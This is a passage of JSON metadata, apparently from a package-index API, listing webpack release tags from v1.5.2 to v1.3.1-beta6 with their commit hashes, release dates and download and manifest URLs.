:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb